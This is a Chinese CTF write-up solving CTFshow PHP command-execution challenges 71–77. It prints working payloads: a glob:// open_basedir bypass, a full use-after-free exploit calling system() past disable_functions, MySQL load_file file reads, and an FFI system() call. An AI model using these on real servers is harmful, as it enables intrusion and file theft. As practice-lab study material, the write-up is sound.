CTFSHOW-WEB入门-命令执行71-77

71. 题目：web 71
    1. 题目：
    2. 解题思路：分析可知highlight_file() 函数被禁了，先想办法看看根目录：c=var_export(scandir(dirname(‘/’))); 尝试一下发现很惊奇：（全是？）这种情况我也有点懵：后来仔细一看，这里给出了源码：简要分析以下代码，在执行$c中的代码之后，首先是获取缓存区的内容，然后将其中的数字字母全部换为？，同时清空缓存区，于是这里出现可开头的一幕，全部都是？，那么我们需要在替换之前让其程序结束掉，不进行替换？的操作，这样就可以得到源文本：再次获取根目录内容—添加一个exit（）函数或者die（）函数均可：使用include（）函数读取：得到flag
72. 题目：web 72
    1. 题目：源码：题目进入后的报错提示：
    2. 解题思路：首先沿用上题的思路试一试：查看根目录内容：但是第一步就悲剧：这段警告是说：scandir() 函数尝试访问一个不在 open_basedir 允许路径内的目录。open_basedir 是一个 PHP 配置指令，用于限制 PHP 脚本能够访问的目录。 只有指定的目录才可以访问。于是（1）首要任务变成了要找出flag所在的目录，查找大佬 的wp发现此题可以使用一种新的思路来找目录：利用php伪协议 glob://

<?php 
//获取一个DirectoryIterator的对象  
//DirectoryIterator 是 PHP 的一个内置类，用于提供一个面向对象的接口来遍历目录。
//glob:// 流包装器：
//glob:// 是 PHP 的一个流包装器，允许你使用与 glob() 函数相同的模式匹配语法来指定文件路径。
//"glob:///*" 意图是匹配根目录下的所有文件和目录。$a = new DirectoryIterator("glob:///*");foreach ($a as $f) {//遍历$a 目录下的所有路径，以字符串的形式打印出来，间隔空格echo ($f->__toString().' ');} exit(0); 
?>

    1. 找flag所在目录，利用到上述代码：（这里的?>可以不加，因为eval（'  '）里面的?>是不会闭合外层函数的，会将里面的内容当作一个完整的PHP代码进行执行）

c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' ');} exit(0); ?>

通过这种方法我们得到了flag所在目录：

    2. 第二步想办法查看flag内容，先用一下include发现不行：![](https://i-blog.csdnimg.cn/img_convert/ec871864a68d9b5873b8d19527dc447f.png)这里又是第二个坎，由于include函数被禁了于是，找大佬的wp，得到一个可以执行PHP系统命令的脚本，适用于类unix的系统： 如Linux或macOS  

<!-- 该脚本的主要用途是在目标PHP服务器上执行系统命令，例如读取文件内容、执行任意命令等。通过利用PHP对象注入漏洞，攻击者可以绕过PHP的安全机制，执行恶意代码。 -->
<?phpfunction ctfshow($cmd) {global $abc, $helper, $backtrace;class Vuln {public $a;public function __destruct() { global $backtrace; unset($this->a);$backtrace = (new Exception)->getTrace();if(!isset($backtrace[1]['args'])) {$backtrace = debug_backtrace();}}}class Helper {public $a, $b, $c, $d;}function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$out .= sprintf("%c",($ptr & 0xff));$ptr >>= 8;}return $out;}function write(&$str, $p, $v, $n = 8) {$i = 0;for($i = 0; $i < $n; $i++) {$str[$p + $i] = sprintf("%c",($v & 0xff));$v >>= 8;}}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type  = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if($p_type == 1 && $p_flags == 6) { $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;$data_size = $p_memsz;} else if($p_type == 1 && $p_flags == 5) { $text_size = $p_memsz;}}if(!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) = $elf;for($i = 0; $i < $data_size / 8; $i++) {$leak = leak($data_addr, $i * 8);if($leak - $base > 0 && $leak - $base < $data_addr - $base) {$deref = leak($leak);if($deref != 0x746e6174736e6f63)continue;} else continue;$leak = leak($data_addr, ($i + 4) * 8);if($leak - $base > 0 && $leak - $base < $data_addr - $base) {$deref = leak($leak);if($deref != 0x786568326e6962)continue;} else continue;return $data_addr + $i * 8;}}function get_binary_base($binary_leak) {$base = 0;$start = $binary_leak & 0xfffffffffffff000;for($i = 0; $i < 0x1000; $i++) {$addr = $start - 0x1000 * $i;$leak = leak($addr, 0, 7);if($leak == 0x10102464c457f) {return $addr;}}}function get_system($basic_funcs) {$addr = $basic_funcs;do {$f_entry = leak($addr);$f_name = leak($f_entry, 0, 6);if($f_name == 0x6d6574737973) {return leak($addr + 8);}$addr += 0x20;} while($f_entry != 0);return false;}function trigger_uaf($arg) {$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');$vuln = new Vuln();$vuln->a = $arg;}if(stristr(PHP_OS, 'WIN')) {die('This PoC is for *nix systems only.');}$n_alloc = 10; $contiguous = [];for($i = 0; $i < $n_alloc; $i++)$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');trigger_uaf('x');$abc = $backtrace[1]['args'][0];$helper = new Helper;$helper->b = function ($x) { };if(strlen($abc) == 79 || strlen($abc) == 0) {die("UAF failed");}$closure_handlers = str2ptr($abc, 0);$php_heap = str2ptr($abc, 0x58);$abc_addr = $php_heap - 0xc8;write($abc, 0x60, 2);write($abc, 0x70, 6);write($abc, 0x10, $abc_addr + 0x60);write($abc, 0x18, 0xa);$closure_obj = str2ptr($abc, 0x20);$binary_leak = leak($closure_handlers, 8);if(!($base = get_binary_base($binary_leak))) {die("Couldn't determine binary base address");}if(!($elf = parse_elf($base))) {die("Couldn't parse ELF header");}if(!($basic_funcs = get_basic_funcs($base, $elf))) {die("Couldn't get basic_functions address");}if(!($zif_system = get_system($basic_funcs))) {die("Couldn't get zif_system address");}$fake_obj_offset = 0xd0;for($i = 0; $i < 0x110; $i += 8) {write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));}write($abc, 0x20, $abc_addr + $fake_obj_offset);write($abc, 0xd0 + 0x38, 1, 4); write($abc, 0xd0 + 0x68, $zif_system); ($helper->b)($cmd);exit();
}ctfshow("cat flag0.txt");ob_end_flush();
?>

于是将其进行url编码传给c变量：得到flag：

3. 知识点： 利用glob：//协议读取文件目录   利用脚本绕过PHP的限制执行命令

73. 题目：web 73
    1. 题目：
    2. 解题思路：本题与上一题类似，先采取上一个题目的获取根目录内容，找flag的位置的解法：使用glob伪协议：c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' ');} exit(0); ?> 得出flag的位置在根目录下的flagc.txt:x想方法查看文件内容：include试一试：发现可行：试一试上一题的脚本：发现被过滤了(2)另解：这道题过滤没有那么严格，于是可以利用之前的c=var_export（scandir（‘/’））;exit();然后使用include或者readgzfile（）查看文件也可以。
74. 题目：web 74
    1. 题目：
    2. 解题思路：先试一试scandir叭：发现被禁了：只好采用glob协议读取根目录内容：发现flag的地方之后，想办法读取：使用include() 包含使用功能类似的表示

1.遍历文件系统
(1) scandir()：
功能：返回指定目录中的文件和目录列表。
示例：scandir('../../..');
注意：返回的是文件和目录名的数组，不包括完整路径。
(2) DirectoryIterator 类：
功能：提供了一个面向对象的接口来遍历目录。
示例： php代码:
$iterator = new DirectoryIterator('../../..');
foreach ($iterator as $fileinfo) {if ($fileinfo->isDot()) continue;echo $fileinfo->getFilename() . "\n";
}
注意：提供了更丰富的目录遍历功能，包括过滤和访问文件信息。
2.输出变量信息
(1)var_dump()：
功能：输出变量的详细信息，包括类型和值。
示例：var_dump(glob('../../..'.'/*'));
注意：输出格式是为人类阅读设计的，不是合法的PHP代码。
(2)print_r()：
功能：以人类可读的格式打印数组或对象。
示例：print_r(glob('../../..'.'/*'));
注意：输出格式更简洁，但同样不是合法的PHP代码。
(3)json_encode()：
功能：将PHP变量转换为JSON格式的字符串。
示例：echo json_encode(glob('../../..'.'/*'));
注意：输出是JSON格式的字符串，可以在JavaScript等环境中使用。

    1. 于是我们还可以使用echo结合json_encode:c=echo json_encode(glob('../../..'.'/*'));exit();同样得到目录：或者var_export(glob('../../..'.'/*'))----这里使用的是glob（）函数![](https://cdn.nlark.com/yuque/0/2025/png/39210681/1738639099957-1dc1a577-e2a6-438b-bf09-ab5be2373498.png)![](https://cdn.nlark.com/yuque/0/2025/png/39210681/1738639140211-28039947-cc86-4b38-91e4-8c3b3eb2e0fb.png)然后在利用include或者readgzfile读取文件内容
3. 知识点：查看变量信息的几种表示  1.var_dump（）2.var_export()   3.print_r()   4.json_encode()

75. 题目：web 75
    1. 题目：
    2. 解题思路：先试一下scandir：发现被禁了：于是再想办法使用glob函数：发现失败了：说明glob函数被禁用了但是在 PHP 中，<font style="color:rgb(251, 71, 135);">glob</font> 函数的行为是独立的，即使 <font style="color:rgb(251, 71, 135);">glob</font> 函数被禁用，使用 <font style="color:rgb(251, 71, 135);">DirectoryIterator</font> 和 <font style="color:rgb(251, 71, 135);">glob://</font> 流也是一种不同的机制，不会直接受到 <font style="color:rgb(251, 71, 135);">glob</font> 函数禁用的影响。 也就是说我们还可以使用glob协议： c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' ');} exit(0); ?> 得到flag的位置：想办法读取：include ()函数被禁：想其他办法：readgzfile（）：也被禁了思路断了，去看看提示，提示给的第二个payload：上传得到了结果看看上传的是啥：

try {//创建 PDO 实例, 连接 MySQL 数据库（ 主机名 数据库名 用户名 密码）//由于pdo对象提供了可以query（）方法可以执行sql语句，于是这里才可以使用load_file函数$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
//这里的数据库名可以用information_schema代替，表示所有数据库
//ctftraining是根据之前ctfshow题目经验推测的//在 MySQL 中，load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。// $row 代表的是字符串的每一行//SELECT load_file("/flag36.txt") 是一个有效的 MySQL 查询，//它请求 MySQL 使用 load_file 函数读取指定路径的文件内容。//这块 SQL 是在 PHP 中编写的，但它的执行是在 MySQL 数据库内部进行的。foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|";//输出完一行之后用|隔开}
// 关闭数据库$dbh = null;
}catch (PDOException $e) {echo $e->getMessage();exit(0);
}
// 整体逻辑是利用try catch执行一个可能引发错误的语句，如果真的有异常会捕获异常并退出，
// 无异常就正常结束
exit(0);

3. 知识点：利用数据库函数load_file(合法路径)读取文件内容

76. 题目：web 76
    1. 题目：
    2. 解题思路：采取类似的方法获取flag位置—借助glob协议：c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' ');} exit(0); ?>得到flag位置：读取文件内容：试试连接数据库，借助pdo对象的query（）函数，使用sql函数load_file：得到结果
    3. 知识点：与上一题类似，复习巩固
77. 题目：web 77
    1. 题目：
    2. 解题思路：首先的话，先看看这个根目录的内容：使用glob协议：发现有两个与flag有关系的文件：flag36.txt和readflag，我们都试着查看一下：借助sql的load_file函数：flag36x.txt内容:readflag内容：同样的这个时候发现有点猫腻，应该是这种方法行不通了，有仔细看看题目：发现题目特别说明了php版本是7.4：通过插件查看php版本，确实是7.4以上的：于是乎上网查看PHP7.4版本以上的命令执行漏洞：找到了一种新思路，由于php7.4以上增加了ffi拓展，这个拓展允许我们直接调用c库里面的函数，甚至可以绕过一些PHP层面的限制，执行c库里面的命令，从而达到命令执行的目的。
       1. 根据题目给的payload：这段代码的意思是利用php的ffi拓展，创建一个ffi对象，利用这个对象调用C库里面的system函数，将readflag重定向为1.txt：代码解析：

$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象
$a='/readflag > 1.txt';//没有回显的，作用是将readflag文件重定向为一个1.txt文件，之前遇到过readflag文件。
//他是一个二进制文件，为可执行文件
$ffi->system($a);//通过$ffi去调用system函数

    2. 执行之后发现没有回显，于是就进行访问：![](https://cdn.nlark.com/yuque/0/2025/png/39210681/1738650375927-28b0ca41-925a-4517-96c2-6af725018e7a.png)
3. 知识点：php7.4的ppi拓展利用[https://blog.csdn.net/weixin_63231007/article/details/129105223?ops_request_misc=%257B%2522request%255Fid%2522%253A%25220e73b2c6dae7024b28a37039e65b5c8e%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=0e73b2c6dae7024b28a37039e65b5c8e&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-2-129105223-null-null.142^v101^pc_search_result_base3&utm_term=FFI%E6%8B%93%E5%B1%95%E5%88%A9%E7%94%A8&spm=1018.2226.3001.4187](https://blog.csdn.net/weixin_63231007/article/details/129105223?ops_request_misc=%257B%2522request%255Fid%2522%253A%25220e73b2c6dae7024b28a37039e65b5c8e%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=0e73b2c6dae7024b28a37039e65b5c8e&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-2-129105223-null-null.142^v101^pc_search_result_base3&utm_term=FFI%E6%8B%93%E5%B1%95%E5%88%A9%E7%94%A8&spm=1018.2226.3001.4187)1. 本题目使用的是第四点 <font style="color:#0d0016;">利用FFI:cdef 绕过 disabled_function进行rce</font>